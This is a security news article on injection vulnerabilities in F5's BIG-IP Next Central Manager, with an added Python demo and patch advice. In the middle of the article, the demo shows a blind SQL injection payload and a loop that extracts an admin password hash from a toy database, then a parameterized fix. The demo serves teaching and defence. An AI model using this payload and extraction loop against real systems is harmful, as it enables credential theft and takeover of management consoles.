
F5 addresses BIG-IP Next Central Manager vulnerabilities with public PoCs (CVE-2024-21793, CVE-2024-26026)


Researchers from Eclypsium have recently disclosed details and proof-of-concept exploits for two critical injection vulnerabilities (CVE-2024-21793, an OData injection, and CVE-2024-26026, a SQL injection) that impact F5's BIG-IP Next Central Manager.

BIG-IP Next Central Manager is the centralized management and analytics console for F5's BIG-IP Next instances. BIG-IP products are widely deployed by large enterprises, including telcos, internet and cloud service providers, and government agencies, to manage and analyze network and application traffic, which makes the management plane a high-value target.

These vulnerabilities, discovered by researcher Vladyslav Babkin, are serious because they allow an unauthenticated attacker to execute arbitrary SQL statements through the BIG-IP Next Central Manager API. In particular, the PoC exploits shared by Eclypsium demonstrate how an attacker can use the injection to retrieve an admin's password hash from the manager's database, a first step toward unauthorized administrative access.
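To make the attack pattern concrete, the following is an added example written for this article. It is not Eclypsium's PoC and not F5 code; the API handler, table, column names and the hash value are all constructed for the demo. It shows a management API that splices an unvalidated filter value into SQL (in the real product the injection point was the API's OData filter, which is translated to SQL), the boolean-based blind extraction an attacker can run against such an endpoint to recover the admin's password hash one character at a time, and the parameterized version of the same lookup, against which the extraction recovers nothing.

```python
"""Added example: blind injection through an API filter parameter.

Hypothetical toy of a management API; not the code of BIG-IP Next Central
Manager. All names and values below are constructed for the demo.
"""
import sqlite3
import string

# Constructed stand-in for a stored bcrypt hash; not a real credential.
SAMPLE_HASH = "$2b$12$abcdefghijklmnopqrstuv"


def make_db():
    """In-memory users table standing in for the manager's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", SAMPLE_HASH, "admin"))
    db.execute("INSERT INTO users VALUES (?, ?, ?)", ("viewer", "$2b$12$zzzz", "viewer"))
    return db


def list_users_vulnerable(db, filter_value):
    """Vulnerable handler: the caller-supplied filter is concatenated into SQL.

    A filter translated from an API query string (e.g. an OData-style
    ``username eq '<value>'``) ends up here unquoted and unescaped.
    """
    sql = f"SELECT username FROM users WHERE username = '{filter_value}'"
    return [row[0] for row in db.execute(sql)]


def list_users_fixed(db, filter_value):
    """Fixed handler: the same lookup with the value bound as a parameter."""
    rows = db.execute("SELECT username FROM users WHERE username = ?", (filter_value,))
    return [row[0] for row in rows]


def oracle(api, db, condition):
    """Boolean oracle: the endpoint leaks one bit per request, namely whether
    the injected condition made the result set non-empty."""
    payload = f"admin' AND ({condition}) AND '1'='1"
    return len(api(db, payload)) > 0


def extract_hash(api, db, max_len=64):
    """Recover the admin's password_hash character by character.

    Each position is probed with one request per candidate character; when
    no candidate matches, substr() has run past the end of the hash.
    """
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (
                "substr((SELECT password_hash FROM users WHERE role='admin'),"
                f"{pos},1)='{ch}'"
            )
            if oracle(api, db, cond):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of hash
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint leaks:", extract_hash(list_users_vulnerable, db))
    print("parameterized endpoint leaks:", repr(extract_hash(list_users_fixed, db)))
```

Against the vulnerable handler the loop recovers the full constructed hash with no error messages and no data returned beyond an empty-or-not list, which is why this class of bug is exploitable even when the API never echoes database content. Against the parameterized handler every probe is treated as a literal username, the oracle never fires, and nothing is recovered. The practical lesson for API code that translates query-language filters (OData, GraphQL, custom DSLs) into SQL is that the translation layer must bind values, never splice them.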

In addition to the documented CVE-2024-21793 and CVE-2024-26026 vulnerabilities, Eclypsium researchers identified three further security flaws that have not been assigned CVE numbers. These weaknesses could let an attacker create unauthorized accounts on managed devices, recover admin passwords from leaked hashes with comparatively little effort, and reset an admin password without knowing the current one.

The researchers emphasized the severity of the situation, stating, “The management console of the Central Manager can be remotely exploited by any attacker able to access the administrative UI via CVE 2024-21793 or CVE 2024-26026. This would result in full administrative control of the manager itself.”

Furthermore, an attacker who has gained control of the manager could chain the other flaws to create new, hidden accounts on any BIG-IP Next asset managed by the Central Manager, and those accounts would not be visible in the Central Manager interface.

F5 has released patches for the two injection vulnerabilities (they are fixed in BIG-IP Next Central Manager 20.2.0) and strongly advises administrators to apply them immediately. Until the update is applied, organizations can reduce their exposure by restricting management access to F5 products to trusted users and devices on a secure management network, and by confirming that the Central Manager's administrative interface is not reachable from the internet.

However, the status of the three additional weaknesses flagged by Eclypsium remains uncertain, as the researchers had not confirmed at the time of writing whether fixes have been released for them. There is currently no evidence that threat actors are actively exploiting any of these vulnerabilities, although the availability of public proof-of-concept code makes exploitation attempts more likely.

In conclusion, the disclosure of these critical vulnerabilities underscores the importance of timely patch management and of keeping management planes off untrusted networks. Organizations using F5's BIG-IP Next Central Manager should update to a fixed release, review management-plane exposure, and audit their managed BIG-IP Next instances for accounts they did not create.
